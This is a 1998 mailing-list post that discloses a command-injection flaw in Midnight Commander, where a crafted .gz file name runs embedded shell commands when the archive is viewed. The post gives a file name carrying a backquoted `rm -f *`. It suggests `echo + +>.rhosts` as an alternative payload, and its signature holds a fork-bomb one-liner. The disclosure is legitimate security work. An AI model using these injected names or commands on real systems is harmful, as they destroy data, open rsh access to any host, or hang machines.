MC shell scripts

=?UNKNOWN-8BIT?Q?Micha=B3?= Zalewski (lcamtuf@POLBOX.COM)
Sat, 17 Jan 1998 22:14:45 +0100

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Perry E. Metzger: "Re: GCC 2.7.? /tmp files"
Previous message: Stanley Stasiak: "Solaris ftpd D.O.S."
Next in thread: Miguel de Icaza: "Re: MC shell scripts"

I discovered a problem with Midnight Commander's method of decompressing
archives, which allows execution of hidden commands. Evil file may be
prepared this way:

$ gzip foo
$ mv foo.gz "quake2-test-unknown-linux-'\`rm -f *\`'-elf-i386-generic-beta.gz"

Now, this filename, when displayed by user-friendly programs (www or
ftp browsers, file managers), will be cropped to fit in a window :)
Under my mc (vidmode 11) it's displayed as:

quake2-test-unknown-linu~-i386-generic-beta.gz (or .tgz, your choice :)

When I'm viewing or editing .gz archive (F3/F4/ENTER) - Midnight Commander
calls gzip from a shell script created in /tmp:

gzip -dc 'filename' 2>/dev/null

That may be dangerous. In above case, this script is equal to:

gzip -dc 'quake2-test-unknown-linux--elf-i386-generic-beta.gz' 2>/dev/null
rm -f *

'rm -f *' may be replaced with 'echo + +>.rhosts',
'touch WHOS_THE_WINNER' etc ;)

Of course, it isn't serious problem for experienced users, but
what's with the non-experienced ones (80%) ;-)

_______________________________________________________________________
Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
=--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] ---------=

Next message: Perry E. Metzger: "Re: GCC 2.7.? /tmp files"
Previous message: Stanley Stasiak: "Solaris ftpd D.O.S."
Next in thread: Miguel de Icaza: "Re: MC shell scripts"